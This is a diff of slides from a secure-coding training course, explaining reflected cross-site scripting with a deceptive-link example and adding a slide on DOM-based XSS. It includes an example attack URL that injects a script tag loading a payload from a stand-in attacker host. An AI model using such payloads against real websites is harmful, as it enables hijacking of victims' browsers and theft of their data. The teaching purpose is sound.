elephantscale/es-training-new/secure-coding/slides/Common-Attacks.md

 ```html
     https://vulnerablewebsite.com?q=news<\script%20src=”http://evilsite.com/payload.js"
 ```
-- The URL description will be deceptive, like "New info that will affect your account"
+- Along with a deceptive description like _Please review this suspicious transaction on your account_
 - A vulnerable website will return the unfiltered content of the query in the error message

 ```html
 Error!!
     <script type=’text/javascript’>payload</script> not found.
 ```
-- Once the error page is loaded, the payload is executed in the victim's browser even though it is inside an error message
+- When the error page is loaded, the payload is executed in the victim's browser

+---

+## DOM XSS Attack

+- The attack payload is executed by modifying the DOM “environment” in the victim’s browser
+- The modification causes the original client side script to run in an “unexpected” manner
+- The HTTP responses is not affected, the HTML does not contain the attack payload
+- The payload is in the body of the page as part of the DOM tree
+- The client side code now executes differently because of the DOM modification
+- Generally executed by injecting malicious code as parameters or URI fragments
+- The malicious code is then incorporated into the existing page code

 ---